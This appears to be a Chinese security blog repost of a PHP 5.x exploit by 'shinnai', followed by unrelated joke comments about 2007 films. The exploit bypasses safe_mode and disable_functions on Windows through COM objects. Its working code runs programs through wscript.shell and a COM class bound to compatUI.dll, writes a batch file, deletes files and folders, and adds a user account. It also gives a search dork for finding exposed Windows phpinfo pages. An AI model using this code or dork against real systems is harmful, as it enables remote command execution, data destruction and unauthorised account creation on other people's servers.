PHP 5.x COM functions safe_mode and disable_function bypass

  1. <?php         
  2. //PHP 5.x COM functions safe_mode and disable_function bypass         
  3.         
  4. //author: shinnai         
  5. //mail: shinnai[at]autistici[dot]org         
  6. //site: http://shinnai.altervista.org         
  7.         
  8. //dork: intitle:phpinfo intext:"php version" +windows (thanks to rgod)         
  9.         
  10. //Tested on xp Pro sp2 full patched, worked both from the cli and on apache         
  11.         
  12. //from: http://www.phpfreaks.com/phpmanual/page/ref.com.html         
  13.         
  14. //Requirements:         
  15. //COM functions are only available for the Windows version of PHP.         
  16. //.Net support requires PHP 5 and the .Net runtime.          
  17.         
  18. //Installation:         
  19. //There is no installation needed to use these functions; they are part of the PHP core. -> (sounds good)         
  20. //The windows version of PHP has built in support for this extension. You do not need to         
  21. //load any additional extension in order to use these functions.         
  22. //You are responsible for installing support for the various COM objects that you intend         
  23. //to use (such as MS Word); we don't and can't bundle all of those with PHP.         
  24.         
  25. //mmm... I don't know how many people use Apache and PHP on Windows servers but I suppose there are         
  26. //a lot of users if PHP developers decide to implement COM functions as part of PHP core.         
  27. //take a look here: intitle:phpinfo intext:"php version" +windows (thanks to rgod).         
  28. //Anyway, I think they should take much care on security due to the fact that, through these         
  29. //functions, you can seriously compromise a pc.         
  30.         
  31. //For remote execution you need (naturally) to use a server that is MS based,         
  32. //e.g. Apache for win configured for working with PHP.         
  33. //In this scenario, someone could upload a script and then use it to damnage the server.         
  34.         
  35. //Local execution simply bypass all Windows protections against execution of dangerous         
  36. //COM objects (even kill-bit) due to the fact that the script is executed from a client that         
  37. //does not check these settings.         
  38.         
  39. //php.ini settings:         
  40. //safe_mode = On         
  41. //disable_functions = com_load_typelib         
  42. //open_basedir = htdocs         
  43.         
  44. //Remote execution requires that open_basedir is disabled         
  45.         
  46. $mPath = str_repeat("..\\",20);      
  47.      
  48. $compatUI = new COM('{0355854A-7F23-47E2-B7C3-97EE8DD42CD8}');  //this one uses compatUI.dll      
  49. $compatUI->RunApplication("something", "notepad.exe", 1);   //to run notepad.exe      
  50.      
  51. $wscript = new COM('wscript.shell');                //this one uses wscript.exe      
  52. $wscript->Run("cmd.exe /c calc.exe");               //to run calc.exe      
  53.      
  54. $FSO = new COM('Scripting.FileSystemObject');           //this one uses wshom.ocx      
  55. $FSO->OpenTextFile($mPath."something.bat", 8, true);        //to create a batch file on server... yes,      
  56.                                                                 //if you want you can write to this batch file :)      
  57.      
  58. $FSOdelFile = new COM('Scripting.FileSystemObject');        //this one uses wshom.ocx      
  59. $FSOdelFile->DeleteFile($mPath."PathToFiles\\*.txt", True); //to delete all files with txt extension      
  60.      
  61. $FSOdelFolder = new COM('Scripting.FileSystemObject');      //this one uses wshom.ocx      
  62. $FSOdelFolder->DeleteFolder($mPath."FolderToDelete", True); //to delete an entire folder       
  63.       
  64. $shgina = new COM('{60664CAF-AF0D-0004-A300-5C7D25FF22A0}');    //this one uses shgina.dll       
  65. $shgina->Create("shinnai");                 //to add an user :)         
  66. ?>

 

关键词: 漏洞 , php

上一篇: PhpSpy2008
下一篇: USB记录清除方法

相关文章
访客评论
#1
回复 启示 2007-12-26, 16:11:54
2007年底六部大片的启示:
《色戒》: 女人不可靠
《苹果》: 男人不可靠
《投名状》:兄弟也不可靠
《集结号》:组织更不可靠
《长江7号》:地球人都不可靠
《命运呼叫转移》:还是中国移动可靠
#2
回复 amxku 2007-12-29, 16:23:56
诚信篇:
《色戒》: 女人不可靠
《苹果》: 男人不可靠
《投名状》:兄弟也不可靠
《集结号》:组织更不可靠
《长江7号》:地球人都不可靠

告诫篇:
《色戒》: 不要玩敌人的女人!
《投名状》:不要玩兄弟的女人!
《苹 果》:不要玩老板的女人!
《长江7号》:不要玩外星的女人!
《集结号》:没有女人就都玩完了……

大片启示最新总结

不男不女的最可靠
《色戒》:救了你命的还是你的女人
《投名状》:为你报仇的还是只有你的兄弟
《集结号》:抛弃你的始终是组织
#3
回复 kiki 2007-12-31, 22:39:40
顶顶了...
#4
回复 kiki 2007-12-31, 22:39:56
引用 kiki 说过的话:
顶顶了...

test
#5
回复 kiki 2007-12-31, 22:48:37
再来一次
#6
回复 kiki 2007-12-31, 22:49:17
测试验证码。。。。
#7
回复 amxku 2008-01-01, 15:04:03
你测试个毛线,早就重新写过了。小样,皮痒痒了吧
#8
回复 kiki 2008-01-02, 21:21:24
你的速度还蛮快的么。呵呵
发表评论

评论内容 (必填):